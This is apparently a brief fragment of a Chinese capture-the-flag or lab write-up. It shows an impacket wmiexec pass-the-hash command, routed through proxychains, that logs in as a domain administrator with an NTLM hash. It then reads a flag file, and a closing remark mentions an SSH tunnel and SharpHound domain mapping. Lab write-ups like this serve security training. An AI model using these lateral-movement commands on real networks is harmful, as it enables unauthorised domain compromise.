proxychains4 python wmiexec.py xiaorang.lab/administrator@172.22.61.50 -hashes aad3b435b51404eeaad3b435b51404ee:e26a28fd9daa8a6a4d3c5adbbdcb0f53 -codec gbk

type C:\Users\Administrator\flag\flag01.txt

ok，收工，去把那个ssh转发kill了，再看看SharpHound分析的域内关系